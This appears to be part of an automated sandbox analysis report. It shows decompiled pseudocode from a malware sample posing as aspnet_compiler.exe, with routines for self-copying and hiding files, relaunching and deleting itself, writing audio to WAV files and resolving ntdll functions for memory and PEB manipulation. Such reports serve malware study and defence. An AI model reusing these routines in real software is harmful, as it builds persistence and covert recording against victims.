                    						__eflags = _a12;
                    						if(_a12 != 0) {
                    							E0040415E(_t73, _t135 - 0x1c, _t125, _t134, "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe");
                    							_push(L"del");
                    							E00412AFC(0x80000001, E00401EE4(E0041A7B9( &_v28, 0x473238)));
                    							E00401EE9();
                    						}
                    						CloseHandle( *0x470d44);
                    						_t35 = ShellExecuteW(0, L"open", E00401EE4(_t131), 0x46a8f0, 0x46a8f0, 1);
                    						__eflags = _t35 - 0x20;
                    						if(_t35 > 0x20) {
                    							ExitProcess(0);
                    						} else {
                    							E0040C577();
                    							L13:
                    							return 0;
                    						}
                    					}
                    					__eflags = _v49 - 0x36;
                    					if(_v49 == 0x36) {
                    						goto L14;
                    					}
                    					_t48 = E0043A3D6(_t130);
                    					_t125 = 0x36;
                    					__eflags = _t48;
                    					if(_t48 == 0) {
                    						E00401EF3(_t131, 0x36, _t131, E0040CF38( &_v24, 0x36, _t73));
                    					} else {
                    						E00401EF3(0x473250, 0x36, _t131, E0040CF38( &_v24, 0x36, _t130));
                    						E00401EE9();
                    						_t125 = E004087F0( &_v52, 0x473250, CopyFileW, "\\");
                    						E00401EF3(_t131, _t60, _t131, E00402FF4(_t73,  &_v28, _t60, _t130, CopyFileW, __eflags, _t73));
                    						E00401EE9();
                    					}
                    					E00401EE9();
                    					CreateDirectoryW(E00401EE4(0x473250), 0);
                    					_t54 = E00401EE4(_t131);
                    					_t73 = 0x470b38;
                    					_t55 = CopyFileW(0x470b38, _t54, 0);
                    					__eflags = _t55;
                    					if(_t55 != 0) {
                    						goto L14;
                    					} else {
                    						L004086CB(0x470b38, _t131, _t125, 0x470b38);
                    						goto L13;
                    					}
                    				} else {
                    					_push(E00401EE4(0x473208));
                    					E0040C21B(0x473208);
                    					return 1;
                    				}
                    			}

                    APIs
                    • _wcslen.LIBCMT ref: 0040C315
                    • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00473298,0000000B,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040C32E
                    • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe,00000000,00000000,00000000,00000000,00000000,?,00473298,0000000B,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040C3DE
                    • _wcslen.LIBCMT ref: 0040C3F4
                    • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040C47C
                    • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe,00000000,00000000), ref: 0040C492
                    • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040C4D1
                    • _wcslen.LIBCMT ref: 0040C4D4
                    • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040C4EB
                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00473298,0000000B), ref: 0040C53B
                    • ShellExecuteW.SHELL32(00000000,open,00000000,0046A8F0,0046A8F0,00000001), ref: 0040C559
                    • ExitProcess.KERNEL32 ref: 0040C570
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                    • String ID: 2G$ 2G$6$82G$C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe$P2G$P2G$P2G$P2G$P2G$del$open
                    • API String ID: 1579085052-2098281891
                    • Opcode ID: 8dd23fb663a3ad3535246375ec9facad4d9fd691e8f5c0ae58ccb9c53b3d1aea
                    • Instruction ID: 2a47eddb00df912b126377051a92c71841ea904bf6b40c506a6d22bed5b78104
                    • Opcode Fuzzy Hash: 8dd23fb663a3ad3535246375ec9facad4d9fd691e8f5c0ae58ccb9c53b3d1aea
                    • Instruction Fuzzy Hash: 3E51C461204340ABD614B7B2EC92A7F2399AF90708F10843FF805A62D3DF7C9D0592AF
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 87%
                    			E00419BA2(void* __ecx, void* __edx, char _a4) {
                    				char _v28;
                    				char _v52;
                    				char _v76;
                    				char _v100;
                    				char _v124;
                    				void* _v128;
                    				char _v176;
                    				char _v192;
                    				void* _v216;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				void* _t23;
                    				void* _t26;
                    				void* _t41;
                    				long _t45;
                    				void* _t61;
                    				void* _t65;
                    				void* _t108;
                    				void* _t110;
                    				void* _t112;
                    				void* _t114;
                    
                    				_t101 = __edx;
                    				_t114 =  &_v124;
                    				_t108 = __ecx;
                    				_t110 = __edx;
                    				if(E00419DF7( &_a4, __ecx, __ecx) == 0xffffffff) {
                    					_t61 = E00401EE4( &_a4);
                    					_t101 = 0x30;
                    					E00401EF3( &_a4, 0x30, _t110, E0040CF38( &_v124, 0x30, _t61));
                    					E00401EE9();
                    				}
                    				_t23 = E0040245C();
                    				_t119 = _t23;
                    				if(_t23 == 0) {
                    					__eflags = PathFileExistsW(E00401EE4( &_a4));
                    					if(__eflags != 0) {
                    						goto L4;
                    					} else {
                    						E00402073(_t65, _t114 - 0x18, _t101, _t112, 0x464074);
                    						_push(0xa8);
                    						E00404A81(0x4738d0, _t101, __eflags);
                    					}
                    				} else {
                    					E0041AE6B(_t110, E00401EE4( &_a4));
                    					L4:
                    					_t26 = E0041A7B9( &_v28, _t108);
                    					_t106 = E00402F85( &_v124, E00402FF4(_t65,  &_v76, E0040AEF6( &_v52, L"open \"", _t112,  &_a4), _t108, _t112, _t119, L"\" type "), _t26);
                    					E00402FF4(_t65,  &_v100, _t30, _t108, _t112, _t119, L" alias audio");
                    					E00401EE9();
                    					E00401EE9();
                    					E00401EE9();
                    					E00401EE9();
                    					mciSendStringW(E00401EE4( &_v100), 0, 0, 0);
                    					mciSendStringA("play audio", 0, 0, 0);
                    					_t115 = _t114 - 0x18;
                    					E00402073(0, _t114 - 0x18, _t30, _t112, 0x464074);
                    					_push(0xa9);
                    					E00404A81(0x4738d0, _t106, 0);
                    					_t41 = CreateEventA(0, 1, 0, 0);
                    					while(1) {
                    						L5:
                    						 *0x472acc = _t41;
                    						while(1) {
                    							_t121 = _t41;
                    							if(_t41 == 0) {
                    								break;
                    							}
                    							__eflags =  *0x472ac9;
                    							if( *0x472ac9 != 0) {
                    								mciSendStringA("pause audio", 0, 0, 0);
                    								 *0x472ac9 = 0;
                    							}
                    							__eflags =  *0x472ac8;
                    							if( *0x472ac8 != 0) {
                    								mciSendStringA("resume audio", 0, 0, 0);
                    								 *0x472ac8 = 0;
                    							}
                    							mciSendStringA("status audio mode",  &_v176, 0x14, 0);
                    							_t45 = E0043E5D0( &_v192, "stopped");
                    							__eflags = _t45;
                    							if(_t45 == 0) {
                    								SetEvent( *0x472acc);
                    							}
                    							__eflags = WaitForSingleObject( *0x472acc, 0x1f4);
                    							if(__eflags != 0) {
                    								_t41 =  *0x472acc;
                    							} else {
                    								CloseHandle( *0x472acc);
                    								_t41 = 0;
                    								goto L5;
                    							}
                    						}
                    						mciSendStringA("stop audio", 0, 0, 0);
                    						mciSendStringA("close audio", 0, 0, 0);
                    						E00402073(0, _t115 - 0x18, _t106, 0x4738d0, 0x464074);
                    						_push(0xaa);
                    						E00404A81(0x4738d0, _t106, _t121);
                    						E00401EE9();
                    						goto L19;
                    					}
                    				}
                    				L19:
                    				return E00401EE9();
                    			}



























                    APIs
                    • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 00419C97
                    • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 00419CAB
                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00464074), ref: 00419CD3
                    • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,?,00000000), ref: 00419CE9
                    • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 00419D2A
                    • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 00419D42
                    • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 00419D57
                    • SetEvent.KERNEL32 ref: 00419D74
                    • WaitForSingleObject.KERNEL32(000001F4), ref: 00419D85
                    • CloseHandle.KERNEL32 ref: 00419D95
                    • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 00419DB7
                    • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 00419DC1
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                    • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
                    • API String ID: 738084811-1354618412
                    • Opcode ID: c111dab898de266138d49a17fad6d12c9f763f368d8fd7dbb43e8f2d80fe68a2
                    • Instruction ID: 455b6cfaa5a4d4cea25ac99553b3555d96430d1d1c5ac1129c3b59e21b3d00b1
                    • Opcode Fuzzy Hash: c111dab898de266138d49a17fad6d12c9f763f368d8fd7dbb43e8f2d80fe68a2
                    • Instruction Fuzzy Hash: 8751C5712442056FD214F761EC92EAF369DEB80348F10443FF546A21E2EE789D898A6F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 92%
                    			E00401A4D(WCHAR* __ecx, signed int __edx) {
                    				void _v4;
                    				void _v8;
                    				void _v12;
                    				void _v16;
                    				void _v20;
                    				void _v24;
                    				long _v28;
                    				signed int _t36;
                    				void** _t75;
                    				signed int _t80;
                    				void* _t81;
                    				signed int _t83;
                    
                    				_t75 = __edx;
                    				_t80 =  *0x470aaa & 0x0000ffff;
                    				_t83 = ( *0x470ab6 & 0x0000ffff) * _t80;
                    				_v16 = 1;
                    				_v20 = 0x10;
                    				_v12 = _t83 *  *0x470aac >> 3;
                    				asm("cdq");
                    				_v8 = _t83 + (__edx & 0x00000007) >> 3;
                    				_t5 =  &(_t75[1]); // 0x0
                    				_t36 =  *_t5 * _t80;
                    				_v4 = _t36;
                    				_v24 = _t36 + 0x24;
                    				_t81 = CreateFileW(__ecx, 0x40000000, 0, 0, 2, 0x80, 0);
                    				if(_t81 != 0xffffffff) {
                    					_push(0);
                    					WriteFile(_t81, "RIFF", 0, 4,  &_v28);
                    					WriteFile(_t81,  &_v24, 0,  &_v28, 0);
                    					WriteFile(_t81, "WAVE", 0,  &_v28, 0);
                    					WriteFile(_t81, "fmt ", 0,  &_v28, 0);
                    					WriteFile(_t81,  &_v20, 0,  &_v28, 0);
                    					WriteFile(_t81,  &_v16, 2,  &_v28, 0);
                    					WriteFile(_t81, 0x470aaa, 2,  &_v28, 0);
                    					WriteFile(_t81, 0x470aac, 0,  &_v28, 0);
                    					WriteFile(_t81,  &_v12, 0,  &_v28, 0);
                    					WriteFile(_t81,  &_v8, 2,  &_v28, 0);
                    					WriteFile(_t81, 0x470ab6, 2,  &_v28, 0);
                    					WriteFile(_t81, "data", 0,  &_v28, 0);
                    					WriteFile(_t81,  &_v4, 0,  &_v28, 0);
                    					_t28 =  &(_t75[1]); // 0x0
                    					WriteFile(_t81,  *_t75,  *_t28,  &_v28, 0);
                    					CloseHandle(_t81);
                    					return 1;
                    				}
                    				return 0;
                    			}
















                    APIs
                    • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AB9
                    • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401AE3
                    • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401AF3
                    • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B03
                    • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B13
                    • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B23
                    • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B34
                    • WriteFile.KERNEL32(00000000,00470AAA,00000002,00000000,00000000), ref: 00401B45
                    • WriteFile.KERNEL32(00000000,00470AAC,00000004,00000000,00000000), ref: 00401B55
                    • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B65
                    • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B76
                    • WriteFile.KERNEL32(00000000,00470AB6,00000002,00000000,00000000), ref: 00401B87
                    • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401B97
                    • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BA7
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$Write$Create
                    • String ID: RIFF$WAVE$data$fmt
                    • API String ID: 1602526932-4212202414
                    • Opcode ID: e9244d672c59e0ffd74479715dd62bb2a6f89e2f1e0128d42166dc8543c173f0
                    • Instruction ID: bbc7d4a3c977ff0e2710d2a536ed23c0b0e069a4161f47bce29e1ad9506f00c9
                    • Opcode Fuzzy Hash: e9244d672c59e0ffd74479715dd62bb2a6f89e2f1e0128d42166dc8543c173f0
                    • Instruction Fuzzy Hash: 8D412EB2654318BAE210DE51DD85FBB7EECEB85B50F40441AFA44D60C0D7A4E909DBB3
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E004068E4() {
                    				_Unknown_base(*)()* _t4;
                    				_Unknown_base(*)()* _t6;
                    				_Unknown_base(*)()* _t9;
                    				_Unknown_base(*)()* _t11;
                    				_Unknown_base(*)()* _t13;
                    				_Unknown_base(*)()* _t15;
                    				WCHAR* _t17;
                    
                    				_t17 = L"ntdll.dll";
                    				_t4 = GetProcAddress(GetModuleHandleW(_t17), "RtlInitUnicodeString");
                    				 *0x470afc = _t4;
                    				if(_t4 != 0) {
                    					_t6 = GetProcAddress(GetModuleHandleW(_t17), "NtAllocateVirtualMemory");
                    					 *0x470b00 = _t6;
                    					if(_t6 == 0) {
                    						goto L1;
                    					}
                    					_t9 = GetProcAddress(GetModuleHandleW(_t17), "NtFreeVirtualMemory");
                    					 *0x470b0c = _t9;
                    					if(_t9 == 0) {
                    						goto L1;
                    					}
                    					_t11 = GetProcAddress(GetModuleHandleW(_t17), "RtlAcquirePebLock");
                    					 *0x470b04 = _t11;
                    					if(_t11 == 0) {
                    						goto L1;
                    					}
                    					_t13 = GetProcAddress(GetModuleHandleW(_t17), "RtlReleasePebLock");
                    					 *0x470b10 = _t13;
                    					if(_t13 == 0) {
                    						goto L1;
                    					}
                    					_t15 = GetProcAddress(GetModuleHandleW(_t17), "LdrEnumerateLoadedModules");
                    					 *0x470af8 = _t15;
                    					return 0 | _t15 != 0x00000000;
                    				}
                    				L1:
                    				return 0;
                    			}











                    APIs
                    • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe,00000001,00406CC1,C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe,00000003,00406CE9,00473220,00406D42), ref: 004068F8
                    • GetProcAddress.KERNEL32(00000000), ref: 00406901
                    • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 00406916
                    • GetProcAddress.KERNEL32(00000000), ref: 00406919
                    • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 0040692A
                    • GetProcAddress.KERNEL32(00000000), ref: 0040692D
                    • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 0040693E
                    • GetProcAddress.KERNEL32(00000000), ref: 00406941
                    • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 00406952
                    • GetProcAddress.KERNEL32(00000000), ref: 00406955
                    • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 00406966
                    • GetProcAddress.KERNEL32(00000000), ref: 00406969
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressHandleModuleProc
                    • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                    • API String ID: 1646373207-3272542945
                    • Opcode ID: c5d62d6da54eaf1f5e298c1ce3456973680903e04872b744077958239b2d5770
                    • Instruction ID: df219cf26e896b26ca7b17cc0f8dfcb6cf109bc3019751d44b8154791cbbdf11
                    • Opcode Fuzzy Hash: c5d62d6da54eaf1f5e298c1ce3456973680903e04872b744077958239b2d5770
                    • Instruction Fuzzy Hash: 190175E1A4130AAADB10777A6C58D476EDC9EA13503120937B405E2691EEBCD8908D6C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 87%
                    			E0044DCAD(signed int _a4, signed int _a8) {
                    				signed int _v0;
                    				signed char _v5;
                    				intOrPtr _v8;
                    				signed char _v9;
                    				signed int _v12;
                    				signed int _v16;
                    				signed int _v20;
                    				intOrPtr _v24;
                    				signed int _v44;
                    				signed int _v92;
                    				signed int _v128;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				signed int _t116;
                    				signed int _t119;
                    				signed int _t120;
                    				signed int _t122;
                    				signed int _t123;
                    				signed int _t126;
                    				signed int _t127;
                    				signed int _t131;
                    				signed int _t133;
                    				signed int _t136;
                    				signed int _t138;
                    				signed int _t139;
                    				signed int _t142;
                    				void* _t143;
                    				signed int _t148;
                    				signed int* _t150;
                    				signed int* _t156;
                    				signed int _t163;
                    				signed int _t165;
                    				signed int _t167;
                    				intOrPtr _t168;
                    				signed int _t173;
                    				signed int _t175;
                    				signed int _t176;
                    				signed int _t180;
                    				signed int _t185;
                    				intOrPtr* _t186;
                    				signed int _t191;
                    				signed int _t196;
                    				signed int _t197;
                    				signed int _t204;
                    				intOrPtr* _t205;
                    				signed int _t214;
                    				signed int _t215;
                    				signed int _t217;
                    				signed int _t218;
                    				signed int _t220;
                    				signed int _t221;
                    				signed int _t223;
                    				intOrPtr _t225;
                    				void* _t231;
                    				signed int _t233;
                    				void* _t236;
                    				signed int _t237;
                    				signed int _t238;
                    				void* _t241;
                    				signed int _t244;
                    				signed int _t246;
                    				void* _t252;
                    				signed int _t253;
                    				signed int _t254;
                    				void* _t260;
                    				void* _t262;
                    				signed int _t263;
                    				intOrPtr* _t267;
                    				intOrPtr* _t271;
                    				signed int _t274;
                    				signed int _t276;
                    				signed int _t280;
                    				signed int _t282;
                    				void* _t283;
                    				void* _t284;
                    				void* _t285;
                    				signed int _t286;
                    				signed int _t288;
                    				signed int _t290;
                    				signed int _t291;
                    				signed int* _t292;
                    				signed int _t298;
                    				signed int _t299;
                    				CHAR* _t300;
                    				signed int _t302;
                    				signed int _t303;
                    				WCHAR* _t304;
                    				signed int _t305;
                    				signed int _t306;
                    				signed int* _t307;
                    				signed int _t308;
                    				signed int _t310;
                    				void* _t316;
                    				void* _t317;
                    				void* _t318;
                    				void* _t320;
                    				void* _t321;
                    				void* _t322;
                    				void* _t323;
                    
                    				_t217 = _a4;
                    				if(_t217 != 0) {
                    					_t286 = _t217;
                    					_t116 = E004371B0(_t217, 0x3d);
                    					_v16 = _t116;
                    					_t231 = _t285;
                    					__eflags = _t116;
                    					if(_t116 == 0) {
                    						L10:
                    						 *((intOrPtr*)(E0043EEAD())) = 0x16;
                    						goto L11;
                    					} else {
                    						__eflags = _t116 - _t217;
                    						if(_t116 == _t217) {
                    							goto L10;
                    						} else {
                    							__eflags =  *((char*)(_t116 + 1));
                    							_t298 =  *0x4704e0; // 0xec46b8
                    							_t120 = _t116 & 0xffffff00 |  *((char*)(_t116 + 1)) == 0x00000000;
                    							_v5 = _t120;
                    							__eflags = _t298 -  *0x4704ec; // 0xec46b8
                    							if(__eflags == 0) {
                    								L87();
                    								_t298 = _t120;
                    								_t120 = _v5;
                    								_t231 = _t298;
                    								 *0x4704e0 = _t298;
                    							}
                    							_t218 = 0;
                    							__eflags = _t298;
                    							if(_t298 != 0) {
                    								L21:
                    								_t233 = _t286;
                    								_t122 = _v16 - _t233;
                    								_push(_t122);
                    								_push(_t233);
                    								L121();
                    								_v12 = _t122;
                    								__eflags = _t122;
                    								if(_t122 < 0) {
                    									L29:
                    									__eflags = _v5 - _t218;
                    									if(_v5 != _t218) {
                    										goto L12;
                    									} else {
                    										_t123 =  ~_t122;
                    										_v12 = _t123;
                    										_t27 = _t123 + 2; // 0x2
                    										_t236 = _t27;
                    										__eflags = _t236 - _t123;
                    										if(_t236 < _t123) {
                    											goto L11;
                    										} else {
                    											__eflags = _t236 - 0x3fffffff;
                    											if(_t236 >= 0x3fffffff) {
                    												goto L11;
                    											} else {
                    												_push(4);
                    												_push(_t236);
                    												_t299 = E0044E355(_t298);
                    												E00445002(_t218);
                    												_t320 = _t320 + 0x10;
                    												__eflags = _t299;
                    												if(_t299 == 0) {
                    													goto L11;
                    												} else {
                    													_t237 = _v12;
                    													_t286 = _t218;
                    													_t126 = _a4;
                    													 *(_t299 + _t237 * 4) = _t126;
                    													 *(_t299 + 4 + _t237 * 4) = _t218;
                    													goto L34;
                    												}
                    											}
                    										}
                    									}
                    								} else {
                    									__eflags =  *_t298 - _t218;
                    									if( *_t298 == _t218) {
                    										goto L29;
                    									} else {
                    										E00445002( *((intOrPtr*)(_t298 + _t122 * 4)));
                    										_t282 = _v12;
                    										__eflags = _v5 - _t218;
                    										if(_v5 != _t218) {
                    											while(1) {
                    												__eflags =  *(_t298 + _t282 * 4) - _t218;
                    												if( *(_t298 + _t282 * 4) == _t218) {
                    													break;
                    												}
                    												 *(_t298 + _t282 * 4) =  *(_t298 + 4 + _t282 * 4);
                    												_t282 = _t282 + 1;
                    												__eflags = _t282;
                    											}
                    											_push(4);
                    											_push(_t282);
                    											_t299 = E0044E355(_t298);
                    											E00445002(_t218);
                    											_t320 = _t320 + 0x10;
                    											_t126 = _t286;
                    											__eflags = _t299;
                    											if(_t299 != 0) {
                    												L34:
                    												 *0x4704e0 = _t299;
                    											}
                    										} else {
                    											_t126 = _a4;
                    											_t286 = _t218;
                    											 *(_t298 + _t282 * 4) = _t126;
                    										}
                    										__eflags = _a8 - _t218;
                    										if(_a8 == _t218) {
                    											goto L12;
                    										} else {
                    											_t238 = _t126;
                    											_t283 = _t238 + 1;
                    											do {
                    												_t127 =  *_t238;
                    												_t238 = _t238 + 1;
                    												__eflags = _t127;
                    											} while (_t127 != 0);
                    											_v12 = _t238 - _t283 + 2;
                    											_t300 = E004443F4(_t238 - _t283, _t238 - _t283 + 2, 1);
                    											_pop(_t241);
                    											__eflags = _t300;
                    											if(_t300 == 0) {
                    												L42:
                    												E00445002(_t300);
                    												goto L12;
                    											} else {
                    												_t131 = E0044030E(_t300, _v12, _a4);
                    												_t321 = _t320 + 0xc;
                    												__eflags = _t131;
                    												if(_t131 != 0) {
                    													_push(_t218);
                    													_push(_t218);
                    													_push(_t218);
                    													_push(_t218);
                    													_push(_t218);
                    													E0043A5E8();
                    													asm("int3");
                    													_t316 = _t321;
                    													_t322 = _t321 - 0xc;
                    													_push(_t218);
                    													_t220 = _v44;
                    													__eflags = _t220;
                    													if(_t220 != 0) {
                    														_push(_t300);
                    														_push(_t286);
                    														_push(0x3d);
                    														_t288 = _t220;
                    														_t133 = E00456277(_t241);
                    														_v20 = _t133;
                    														_t244 = _t220;
                    														__eflags = _t133;
                    														if(_t133 == 0) {
                    															L54:
                    															 *((intOrPtr*)(E0043EEAD())) = 0x16;
                    															goto L55;
                    														} else {
                    															__eflags = _t133 - _t220;
                    															if(_t133 == _t220) {
                    																goto L54;
                    															} else {
                    																_t302 =  *0x4704e4; // 0xecda90
                    																_t221 = 0;
                    																__eflags =  *(_t133 + 2);
                    																_t246 = _t244 & 0xffffff00 |  *(_t133 + 2) == 0x00000000;
                    																_v9 = _t246;
                    																__eflags = _t302 -  *0x4704e8; // 0xec49d0
                    																if(__eflags == 0) {
                    																	_push(_t302);
                    																	L104();
                    																	_t246 = _v9;
                    																	_t302 = _t133;
                    																	 *0x4704e4 = _t302;
                    																}
                    																__eflags = _t302;
                    																if(_t302 != 0) {
                    																	L64:
                    																	_v20 = _v20 - _t288 >> 1;
                    																	_t138 = E0044E2E8(_t288, _v20 - _t288 >> 1);
                    																	_v16 = _t138;
                    																	__eflags = _t138;
                    																	if(_t138 < 0) {
                    																		L72:
                    																		__eflags = _v9 - _t221;
                    																		if(_v9 != _t221) {
                    																			goto L56;
                    																		} else {
                    																			_t139 =  ~_t138;
                    																			_v16 = _t139;
                    																			_t72 = _t139 + 2; // 0x2
                    																			_t252 = _t72;
                    																			__eflags = _t252 - _t139;
                    																			if(_t252 < _t139) {
                    																				goto L55;
                    																			} else {
                    																				__eflags = _t252 - 0x3fffffff;
                    																				if(_t252 >= 0x3fffffff) {
                    																					goto L55;
                    																				} else {
                    																					_push(4);
                    																					_push(_t252);
                    																					_t303 = E0044E355(_t302);
                    																					E00445002(_t221);
                    																					_t322 = _t322 + 0x10;
                    																					__eflags = _t303;
                    																					if(_t303 == 0) {
                    																						goto L55;
                    																					} else {
                    																						_t253 = _v16;
                    																						_t288 = _t221;
                    																						_t142 = _v0;
                    																						 *(_t303 + _t253 * 4) = _t142;
                    																						 *(_t303 + 4 + _t253 * 4) = _t221;
                    																						goto L77;
                    																					}
                    																				}
                    																			}
                    																		}
                    																	} else {
                    																		__eflags =  *_t302 - _t221;
                    																		if( *_t302 == _t221) {
                    																			goto L72;
                    																		} else {
                    																			E00445002( *((intOrPtr*)(_t302 + _t138 * 4)));
                    																			_t276 = _v16;
                    																			__eflags = _v9 - _t221;
                    																			if(_v9 != _t221) {
                    																				while(1) {
                    																					__eflags =  *(_t302 + _t276 * 4) - _t221;
                    																					if( *(_t302 + _t276 * 4) == _t221) {
                    																						break;
                    																					}
                    																					 *(_t302 + _t276 * 4) =  *(_t302 + 4 + _t276 * 4);
                    																					_t276 = _t276 + 1;
                    																					__eflags = _t276;
                    																				}
                    																				_push(4);
                    																				_push(_t276);
                    																				_t303 = E0044E355(_t302);
                    																				E00445002(_t221);
                    																				_t322 = _t322 + 0x10;
                    																				_t142 = _t288;
                    																				__eflags = _t303;
                    																				if(_t303 != 0) {
                    																					L77:
                    																					 *0x4704e4 = _t303;
                    																				}
                    																			} else {
                    																				_t142 = _v0;
                    																				_t288 = _t221;
                    																				 *(_t302 + _t276 * 4) = _t142;
                    																			}
                    																			__eflags = _a4 - _t221;
                    																			if(_a4 == _t221) {
                    																				goto L56;
                    																			} else {
                    																				_t254 = _t142;
                    																				_t81 = _t254 + 2; // 0x2
                    																				_t284 = _t81;
                    																				do {
                    																					_t143 =  *_t254;
                    																					_t254 = _t254 + 2;
                    																					__eflags = _t143 - _t221;
                    																				} while (_t143 != _t221);
                    																				_t82 = (_t254 - _t284 >> 1) + 2; // 0x0
                    																				_v16 = _t82;
                    																				_t304 = E004443F4(_t254 - _t284 >> 1, _t82, 2);
                    																				_pop(_t258);
                    																				__eflags = _t304;
                    																				if(_t304 == 0) {
                    																					L85:
                    																					E00445002(_t304);
                    																					goto L56;
                    																				} else {
                    																					_t148 = E004463E1(_t304, _v16, _v0);
                    																					_t323 = _t322 + 0xc;
                    																					__eflags = _t148;
                    																					if(_t148 != 0) {
                    																						_push(_t221);
                    																						_push(_t221);
                    																						_push(_t221);
                    																						_push(_t221);
                    																						_push(_t221);
                    																						E0043A5E8();
                    																						asm("int3");
                    																						_push(_t316);
                    																						_t317 = _t323;
                    																						_push(_t288);
                    																						_t290 = _v92;
                    																						__eflags = _t290;
                    																						if(_t290 != 0) {
                    																							_t260 = 0;
                    																							_t150 = _t290;
                    																							__eflags =  *_t290;
                    																							if( *_t290 != 0) {
                    																								do {
                    																									_t150 =  &(_t150[1]);
                    																									_t260 = _t260 + 1;
                    																									__eflags =  *_t150;
                    																								} while ( *_t150 != 0);
                    																							}
                    																							_t93 = _t260 + 1; // 0x2
                    																							_t305 = E004443F4(_t260, _t93, 4);
                    																							_t262 = _t304;
                    																							__eflags = _t305;
                    																							if(_t305 == 0) {
                    																								L102:
                    																								E004449F5(_t221, _t284, _t290, _t305);
                    																								goto L103;
                    																							} else {
                    																								__eflags =  *_t290;
                    																								if( *_t290 == 0) {
                    																									L100:
                    																									E00445002(0);
                    																									_t175 = _t305;
                    																									goto L101;
                    																								} else {
                    																									_push(_t221);
                    																									_t221 = _t305 - _t290;
                    																									__eflags = _t221;
                    																									do {
                    																										_t271 =  *_t290;
                    																										_t94 = _t271 + 1; // 0x5
                    																										_t284 = _t94;
                    																										do {
                    																											_t176 =  *_t271;
                    																											_t271 = _t271 + 1;
                    																											__eflags = _t176;
                    																										} while (_t176 != 0);
                    																										_t262 = _t271 - _t284;
                    																										_t95 = _t262 + 1; // 0x6
                    																										_v16 = _t95;
